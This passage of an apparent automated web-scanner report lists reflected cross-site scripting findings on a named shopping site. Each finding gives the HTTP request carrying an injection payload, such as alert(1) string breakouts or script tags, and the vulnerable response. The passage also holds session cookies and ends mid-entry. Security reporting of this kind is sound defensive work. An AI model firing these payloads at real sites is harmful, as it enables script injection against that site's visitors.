GET /Shopping/Clothing-Accessories/194367784/Leather-Goods/7633884'-alert(1)-'81af099caa5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:26:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/194367784/Leather-Goods/7633884'-alert(1)-'81af099caa5';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.844. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Shoes/26 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Shoes/26

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7b37"><a>c4d399baf66 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingb7b37"><a>c4d399baf66/Clothing-Accessories/194367784/Shoes/26 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:51:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingb7b37"><a>c4d399baf66">
...[SNIP]...

4.845. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Shoes/26 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Shoes/26

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e087'-alert(1)-'c386b19e7ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping7e087'-alert(1)-'c386b19e7ff/Clothing-Accessories/194367784/Shoes/26 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:59:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping7e087'-alert(1)-'c386b19e7ff/Clothing-Accessories/194367784/Shoes/26';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.846. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Shoes/26 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Shoes/26

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d2993<script>alert(1)</script>75d3d52f674 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessoriesd2993<script>alert(1)</script>75d3d52f674/194367784/Shoes/26 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:03:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessoriesd2993<script>alert(1)</script>75d3d52f674 <a href="#" id="backlink">
...[SNIP]...

4.847. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Shoes/26 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Shoes/26

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14482'-alert(1)-'ad7f2c767e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories14482'-alert(1)-'ad7f2c767e5/194367784/Shoes/26 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:02:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories14482'-alert(1)-'ad7f2c767e5/194367784/Shoes/26';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.848. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Shoes/26 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Shoes/26

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2780c'-alert(1)-'6021778fc8b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/1943677842780c'-alert(1)-'6021778fc8b/Shoes/26 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:05:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories/1943677842780c'-alert(1)-'6021778fc8b/Shoes/26';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.849. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Shoes/26 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Shoes/26

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46cc6'-alert(1)-'bb7743f175e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Shoes46cc6'-alert(1)-'bb7743f175e/26 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:09:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Clothing-Accessories/194367784/Shoes46cc6'-alert(1)-'bb7743f175e/26';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.850. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Shoes/26 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Shoes/26

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bbcd'-alert(1)-'908d6412763 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Shoes/267bbcd'-alert(1)-'908d6412763 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:15:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Clothing-Accessories/194367784/Shoes/267bbcd'-alert(1)-'908d6412763';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.851. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Swimwear/53 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Swimwear/53

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a6fa"><a>edfe7e65f36 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping3a6fa"><a>edfe7e65f36/Clothing-Accessories/194367784/Swimwear/53 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:14:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping3a6fa"><a>edfe7e65f36">
...[SNIP]...

4.852. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Swimwear/53 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Swimwear/53

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbd4e'-alert(1)-'c5cf03e5ec1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shoppingdbd4e'-alert(1)-'c5cf03e5ec1/Clothing-Accessories/194367784/Swimwear/53 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:26:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shoppingdbd4e'-alert(1)-'c5cf03e5ec1/Clothing-Accessories/194367784/Swimwear/53';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.853. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Swimwear/53 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Swimwear/53

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f2d0'-alert(1)-'39bc71dac90 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories6f2d0'-alert(1)-'39bc71dac90/194367784/Swimwear/53 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:32:31 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories6f2d0'-alert(1)-'39bc71dac90/194367784/Swimwear/53';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.854. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Swimwear/53 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Swimwear/53

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4fd2c<script>alert(1)</script>10f60d99e65 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessories4fd2c<script>alert(1)</script>10f60d99e65/194367784/Swimwear/53 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:33:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessories4fd2c<script>alert(1)</script>10f60d99e65 <a href="#" id="backlink">
...[SNIP]...

4.855. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Swimwear/53 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Swimwear/53

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 447c8'-alert(1)-'a0cd7cd231e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784447c8'-alert(1)-'a0cd7cd231e/Swimwear/53 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:37:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/194367784447c8'-alert(1)-'a0cd7cd231e/Swimwear/53';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.856. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Swimwear/53 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Swimwear/53

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc070'-alert(1)-'489ba6c8d0d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

